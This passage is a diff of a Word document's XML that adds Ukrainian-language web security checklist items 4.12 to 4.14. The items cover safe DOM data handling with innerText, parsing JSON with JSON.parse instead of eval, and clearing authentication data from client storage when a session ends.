+              <w:spacing w:line="360" w:lineRule="auto"/>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:color w:val="212121"/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+                <w:lang w:eastAsia="ru-RU"/>
+              </w:rPr>
+            </w:pPr>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="540" w:type="dxa"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:tabs>
+                <w:tab w:val="left" w:pos="916"/>
+                <w:tab w:val="left" w:pos="1832"/>
+                <w:tab w:val="left" w:pos="2748"/>
+                <w:tab w:val="left" w:pos="3664"/>
+                <w:tab w:val="left" w:pos="4580"/>
+                <w:tab w:val="left" w:pos="5496"/>
+                <w:tab w:val="left" w:pos="6412"/>
+                <w:tab w:val="left" w:pos="7328"/>
+                <w:tab w:val="left" w:pos="8244"/>
+                <w:tab w:val="left" w:pos="9160"/>
+                <w:tab w:val="left" w:pos="10076"/>
+                <w:tab w:val="left" w:pos="10992"/>
+                <w:tab w:val="left" w:pos="11908"/>
+                <w:tab w:val="left" w:pos="12824"/>
+                <w:tab w:val="left" w:pos="13740"/>
+                <w:tab w:val="left" w:pos="14656"/>
+              </w:tabs>
+              <w:spacing w:line="360" w:lineRule="auto"/>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:color w:val="212121"/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+                <w:lang w:eastAsia="ru-RU"/>
+              </w:rPr>
+            </w:pPr>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="553" w:type="dxa"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:tabs>
+                <w:tab w:val="left" w:pos="916"/>
+                <w:tab w:val="left" w:pos="1832"/>
+                <w:tab w:val="left" w:pos="2748"/>
+                <w:tab w:val="left" w:pos="3664"/>
+                <w:tab w:val="left" w:pos="4580"/>
+                <w:tab w:val="left" w:pos="5496"/>
+                <w:tab w:val="left" w:pos="6412"/>
+                <w:tab w:val="left" w:pos="7328"/>
+                <w:tab w:val="left" w:pos="8244"/>
+                <w:tab w:val="left" w:pos="9160"/>
+                <w:tab w:val="left" w:pos="10076"/>
+                <w:tab w:val="left" w:pos="10992"/>
+                <w:tab w:val="left" w:pos="11908"/>
+                <w:tab w:val="left" w:pos="12824"/>
+                <w:tab w:val="left" w:pos="13740"/>
+                <w:tab w:val="left" w:pos="14656"/>
+              </w:tabs>
+              <w:spacing w:line="360" w:lineRule="auto"/>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:color w:val="212121"/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+                <w:lang w:eastAsia="ru-RU"/>
+              </w:rPr>
+            </w:pPr>
+          </w:p>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="738" w:type="dxa"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:tabs>
+                <w:tab w:val="left" w:pos="916"/>
+                <w:tab w:val="left" w:pos="1832"/>
+                <w:tab w:val="left" w:pos="2748"/>
+                <w:tab w:val="left" w:pos="3664"/>
+                <w:tab w:val="left" w:pos="4580"/>
+                <w:tab w:val="left" w:pos="5496"/>
+                <w:tab w:val="left" w:pos="6412"/>
+                <w:tab w:val="left" w:pos="7328"/>
+                <w:tab w:val="left" w:pos="8244"/>
+                <w:tab w:val="left" w:pos="9160"/>
+                <w:tab w:val="left" w:pos="10076"/>
+                <w:tab w:val="left" w:pos="10992"/>
+                <w:tab w:val="left" w:pos="11908"/>
+                <w:tab w:val="left" w:pos="12824"/>
+                <w:tab w:val="left" w:pos="13740"/>
+                <w:tab w:val="left" w:pos="14656"/>
+              </w:tabs>
+              <w:spacing w:line="360" w:lineRule="auto"/>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:color w:val="212121"/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+                <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:color w:val="212121"/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+                <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
+              </w:rPr>
+              <w:t>4.12</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="7110" w:type="dxa"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:tabs>
+                <w:tab w:val="left" w:pos="916"/>
+                <w:tab w:val="left" w:pos="1832"/>
+                <w:tab w:val="left" w:pos="2748"/>
+                <w:tab w:val="left" w:pos="3664"/>
+                <w:tab w:val="left" w:pos="4580"/>
+                <w:tab w:val="left" w:pos="5496"/>
+                <w:tab w:val="left" w:pos="6412"/>
+                <w:tab w:val="left" w:pos="7328"/>
+                <w:tab w:val="left" w:pos="8244"/>
+                <w:tab w:val="left" w:pos="9160"/>
+                <w:tab w:val="left" w:pos="10076"/>
+                <w:tab w:val="left" w:pos="10992"/>
+                <w:tab w:val="left" w:pos="11908"/>
+                <w:tab w:val="left" w:pos="12824"/>
+                <w:tab w:val="left" w:pos="13740"/>
+                <w:tab w:val="left" w:pos="14656"/>
+              </w:tabs>
+              <w:spacing w:line="360" w:lineRule="auto"/>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:color w:val="212121"/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+                <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:color w:val="212121"/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+                <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
+              </w:rPr>
+              <w:t>Переконайтеся в тому, що дані, що передаються з одного контексту</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:color w:val="212121"/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+                <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> </w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:color w:val="212121"/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+                <w:lang w:eastAsia="ru-RU"/>
+              </w:rPr>
+              <w:t>DOM</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:color w:val="212121"/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+                <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> в інший</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:color w:val="212121"/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+                <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
+              </w:rPr>
+              <w:t>, використовуют</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:color w:val="212121"/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+                <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> безпечні методи </w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:color w:val="212121"/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+                <w:lang w:eastAsia="ru-RU"/>
+              </w:rPr>
+              <w:t>JavaScript</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:color w:val="212121"/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+                <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
+              </w:rPr>
+              <w:t xml:space="preserve">, такі як </w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:color w:val="212121"/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+                <w:lang w:eastAsia="ru-RU"/>
+              </w:rPr>
+              <w:t>InnerText</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:color w:val="212121"/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+                <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> і </w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:color w:val="212121"/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+                <w:lang w:eastAsia="ru-RU"/>
+              </w:rPr>
+              <w:t>val</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:color w:val="212121"/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
                 <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
               </w:rPr>
-            </w:pPr>
+              <w:t>ue</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:color w:val="212121"/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+                <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
+              </w:rPr>
+              <w:t>.</w:t>
+            </w:r>
           </w:p>
         </w:tc>
         <w:tc>
@@ -18589,7 +19035,7 @@
                 <w:color w:val="212121"/>
                 <w:sz w:val="28"/>
                 <w:szCs w:val="28"/>
-                <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
+                <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
               </w:rPr>
             </w:pPr>
           </w:p>
@@ -18624,7 +19070,7 @@
                 <w:color w:val="212121"/>
                 <w:sz w:val="28"/>
                 <w:szCs w:val="28"/>
-                <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
+                <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
               </w:rPr>
             </w:pPr>
           </w:p>
@@ -18659,7 +19105,441 @@
                 <w:color w:val="212121"/>
                 <w:sz w:val="28"/>
                 <w:szCs w:val="28"/>
-                <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
+                <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
+              </w:rPr>
+            </w:pPr>
+          </w:p>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="738" w:type="dxa"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:tabs>
+                <w:tab w:val="left" w:pos="916"/>
+                <w:tab w:val="left" w:pos="1832"/>
+                <w:tab w:val="left" w:pos="2748"/>
+                <w:tab w:val="left" w:pos="3664"/>
+                <w:tab w:val="left" w:pos="4580"/>
+                <w:tab w:val="left" w:pos="5496"/>
+                <w:tab w:val="left" w:pos="6412"/>
+                <w:tab w:val="left" w:pos="7328"/>
+                <w:tab w:val="left" w:pos="8244"/>
+                <w:tab w:val="left" w:pos="9160"/>
+                <w:tab w:val="left" w:pos="10076"/>
+                <w:tab w:val="left" w:pos="10992"/>
+                <w:tab w:val="left" w:pos="11908"/>
+                <w:tab w:val="left" w:pos="12824"/>
+                <w:tab w:val="left" w:pos="13740"/>
+                <w:tab w:val="left" w:pos="14656"/>
+              </w:tabs>
+              <w:spacing w:line="360" w:lineRule="auto"/>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:color w:val="212121"/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+                <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:color w:val="212121"/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+                <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
+              </w:rPr>
+              <w:t>4.13</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="7110" w:type="dxa"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:tabs>
+                <w:tab w:val="left" w:pos="916"/>
+                <w:tab w:val="left" w:pos="1832"/>
+                <w:tab w:val="left" w:pos="2748"/>
+                <w:tab w:val="left" w:pos="3664"/>
+                <w:tab w:val="left" w:pos="4580"/>
+                <w:tab w:val="left" w:pos="5496"/>
+                <w:tab w:val="left" w:pos="6412"/>
+                <w:tab w:val="left" w:pos="7328"/>
+                <w:tab w:val="left" w:pos="8244"/>
+                <w:tab w:val="left" w:pos="9160"/>
+                <w:tab w:val="left" w:pos="10076"/>
+                <w:tab w:val="left" w:pos="10992"/>
+                <w:tab w:val="left" w:pos="11908"/>
+                <w:tab w:val="left" w:pos="12824"/>
+                <w:tab w:val="left" w:pos="13740"/>
+                <w:tab w:val="left" w:pos="14656"/>
+              </w:tabs>
+              <w:spacing w:line="360" w:lineRule="auto"/>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:color w:val="212121"/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+                <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:color w:val="212121"/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+                <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
+              </w:rPr>
+              <w:t>Перевірка при аналізі JSON в браузерах, що JSON.parse використовується для розбору JSON на стороні клієнта. Не використовуйте Eval () для розбору JSON на стороні клієнта.</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="630" w:type="dxa"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:tabs>
+                <w:tab w:val="left" w:pos="916"/>
+                <w:tab w:val="left" w:pos="1832"/>
+                <w:tab w:val="left" w:pos="2748"/>
+                <w:tab w:val="left" w:pos="3664"/>
+                <w:tab w:val="left" w:pos="4580"/>
+                <w:tab w:val="left" w:pos="5496"/>
+                <w:tab w:val="left" w:pos="6412"/>
+                <w:tab w:val="left" w:pos="7328"/>
+                <w:tab w:val="left" w:pos="8244"/>
+                <w:tab w:val="left" w:pos="9160"/>
+                <w:tab w:val="left" w:pos="10076"/>
+                <w:tab w:val="left" w:pos="10992"/>
+                <w:tab w:val="left" w:pos="11908"/>
+                <w:tab w:val="left" w:pos="12824"/>
+                <w:tab w:val="left" w:pos="13740"/>
+                <w:tab w:val="left" w:pos="14656"/>
+              </w:tabs>
+              <w:spacing w:line="360" w:lineRule="auto"/>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:color w:val="212121"/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+                <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
+              </w:rPr>
+            </w:pPr>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="540" w:type="dxa"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:tabs>
+                <w:tab w:val="left" w:pos="916"/>
+                <w:tab w:val="left" w:pos="1832"/>
+                <w:tab w:val="left" w:pos="2748"/>
+                <w:tab w:val="left" w:pos="3664"/>
+                <w:tab w:val="left" w:pos="4580"/>
+                <w:tab w:val="left" w:pos="5496"/>
+                <w:tab w:val="left" w:pos="6412"/>
+                <w:tab w:val="left" w:pos="7328"/>
+                <w:tab w:val="left" w:pos="8244"/>
+                <w:tab w:val="left" w:pos="9160"/>
+                <w:tab w:val="left" w:pos="10076"/>
+                <w:tab w:val="left" w:pos="10992"/>
+                <w:tab w:val="left" w:pos="11908"/>
+                <w:tab w:val="left" w:pos="12824"/>
+                <w:tab w:val="left" w:pos="13740"/>
+                <w:tab w:val="left" w:pos="14656"/>
+              </w:tabs>
+              <w:spacing w:line="360" w:lineRule="auto"/>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:color w:val="212121"/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+                <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
+              </w:rPr>
+            </w:pPr>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="553" w:type="dxa"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:tabs>
+                <w:tab w:val="left" w:pos="916"/>
+                <w:tab w:val="left" w:pos="1832"/>
+                <w:tab w:val="left" w:pos="2748"/>
+                <w:tab w:val="left" w:pos="3664"/>
+                <w:tab w:val="left" w:pos="4580"/>
+                <w:tab w:val="left" w:pos="5496"/>
+                <w:tab w:val="left" w:pos="6412"/>
+                <w:tab w:val="left" w:pos="7328"/>
+                <w:tab w:val="left" w:pos="8244"/>
+                <w:tab w:val="left" w:pos="9160"/>
+                <w:tab w:val="left" w:pos="10076"/>
+                <w:tab w:val="left" w:pos="10992"/>
+                <w:tab w:val="left" w:pos="11908"/>
+                <w:tab w:val="left" w:pos="12824"/>
+                <w:tab w:val="left" w:pos="13740"/>
+                <w:tab w:val="left" w:pos="14656"/>
+              </w:tabs>
+              <w:spacing w:line="360" w:lineRule="auto"/>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:color w:val="212121"/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+                <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
+              </w:rPr>
+            </w:pPr>
+          </w:p>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="738" w:type="dxa"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:tabs>
+                <w:tab w:val="left" w:pos="916"/>
+                <w:tab w:val="left" w:pos="1832"/>
+                <w:tab w:val="left" w:pos="2748"/>
+                <w:tab w:val="left" w:pos="3664"/>
+                <w:tab w:val="left" w:pos="4580"/>
+                <w:tab w:val="left" w:pos="5496"/>
+                <w:tab w:val="left" w:pos="6412"/>
+                <w:tab w:val="left" w:pos="7328"/>
+                <w:tab w:val="left" w:pos="8244"/>
+                <w:tab w:val="left" w:pos="9160"/>
+                <w:tab w:val="left" w:pos="10076"/>
+                <w:tab w:val="left" w:pos="10992"/>
+                <w:tab w:val="left" w:pos="11908"/>
+                <w:tab w:val="left" w:pos="12824"/>
+                <w:tab w:val="left" w:pos="13740"/>
+                <w:tab w:val="left" w:pos="14656"/>
+              </w:tabs>
+              <w:spacing w:line="360" w:lineRule="auto"/>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:color w:val="212121"/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+                <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:color w:val="212121"/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+                <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
+              </w:rPr>
+              <w:t>4.14</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="7110" w:type="dxa"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:tabs>
+                <w:tab w:val="left" w:pos="916"/>
+                <w:tab w:val="left" w:pos="1832"/>
+                <w:tab w:val="left" w:pos="2748"/>
+                <w:tab w:val="left" w:pos="3664"/>
+                <w:tab w:val="left" w:pos="4580"/>
+                <w:tab w:val="left" w:pos="5496"/>
+                <w:tab w:val="left" w:pos="6412"/>
+                <w:tab w:val="left" w:pos="7328"/>
+                <w:tab w:val="left" w:pos="8244"/>
+                <w:tab w:val="left" w:pos="9160"/>
+                <w:tab w:val="left" w:pos="10076"/>
+                <w:tab w:val="left" w:pos="10992"/>
+                <w:tab w:val="left" w:pos="11908"/>
+                <w:tab w:val="left" w:pos="12824"/>
+                <w:tab w:val="left" w:pos="13740"/>
+                <w:tab w:val="left" w:pos="14656"/>
+              </w:tabs>
+              <w:spacing w:line="360" w:lineRule="auto"/>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:color w:val="212121"/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+                <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:color w:val="212121"/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+                <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
+              </w:rPr>
+              <w:t>Переконайтеся, що дані</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:color w:val="212121"/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+                <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> аутентифікації</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:color w:val="212121"/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+                <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> видаляються зі сховища клієнта, наприклад, DOM</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:color w:val="212121"/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+                <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> в браузері</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:color w:val="212121"/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+                <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
+              </w:rPr>
+              <w:t>, після того, як сеанс завершується.</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="630" w:type="dxa"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:tabs>
+                <w:tab w:val="left" w:pos="916"/>
+                <w:tab w:val="left" w:pos="1832"/>
+                <w:tab w:val="left" w:pos="2748"/>
+                <w:tab w:val="left" w:pos="3664"/>
+                <w:tab w:val="left" w:pos="4580"/>
+                <w:tab w:val="left" w:pos="5496"/>
+                <w:tab w:val="left" w:pos="6412"/>
+                <w:tab w:val="left" w:pos="7328"/>
+                <w:tab w:val="left" w:pos="8244"/>
+                <w:tab w:val="left" w:pos="9160"/>
+                <w:tab w:val="left" w:pos="10076"/>
+                <w:tab w:val="left" w:pos="10992"/>
+                <w:tab w:val="left" w:pos="11908"/>
+                <w:tab w:val="left" w:pos="12824"/>
+                <w:tab w:val="left" w:pos="13740"/>
+                <w:tab w:val="left" w:pos="14656"/>
+              </w:tabs>
+              <w:spacing w:line="360" w:lineRule="auto"/>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:color w:val="212121"/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+                <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
+              </w:rPr>
+            </w:pPr>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="540" w:type="dxa"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:tabs>
+                <w:tab w:val="left" w:pos="916"/>
+                <w:tab w:val="left" w:pos="1832"/>
+                <w:tab w:val="left" w:pos="2748"/>
+                <w:tab w:val="left" w:pos="3664"/>
+                <w:tab w:val="left" w:pos="4580"/>
+                <w:tab w:val="left" w:pos="5496"/>
+                <w:tab w:val="left" w:pos="6412"/>
+                <w:tab w:val="left" w:pos="7328"/>
+                <w:tab w:val="left" w:pos="8244"/>
+                <w:tab w:val="left" w:pos="9160"/>
+                <w:tab w:val="left" w:pos="10076"/>
+                <w:tab w:val="left" w:pos="10992"/>
+                <w:tab w:val="left" w:pos="11908"/>
+                <w:tab w:val="left" w:pos="12824"/>
+                <w:tab w:val="left" w:pos="13740"/>
+                <w:tab w:val="left" w:pos="14656"/>
+              </w:tabs>
+              <w:spacing w:line="360" w:lineRule="auto"/>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:color w:val="212121"/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+                <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
+              </w:rPr>
+            </w:pPr>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="553" w:type="dxa"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:tabs>
+                <w:tab w:val="left" w:pos="916"/>
+                <w:tab w:val="left" w:pos="1832"/>
+                <w:tab w:val="left" w:pos="2748"/>
+                <w:tab w:val="left" w:pos="3664"/>
+                <w:tab w:val="left" w:pos="4580"/>
+                <w:tab w:val="left" w:pos="5496"/>
+                <w:tab w:val="left" w:pos="6412"/>
+                <w:tab w:val="left" w:pos="7328"/>
+                <w:tab w:val="left" w:pos="8244"/>
+                <w:tab w:val="left" w:pos="9160"/>
+                <w:tab w:val="left" w:pos="10076"/>
+                <w:tab w:val="left" w:pos="10992"/>
+                <w:tab w:val="left" w:pos="11908"/>
+                <w:tab w:val="left" w:pos="12824"/>
+                <w:tab w:val="left" w:pos="13740"/>
+                <w:tab w:val="left" w:pos="14656"/>
+              </w:tabs>
+              <w:spacing w:line="360" w:lineRule="auto"/>
+              <w:rPr>
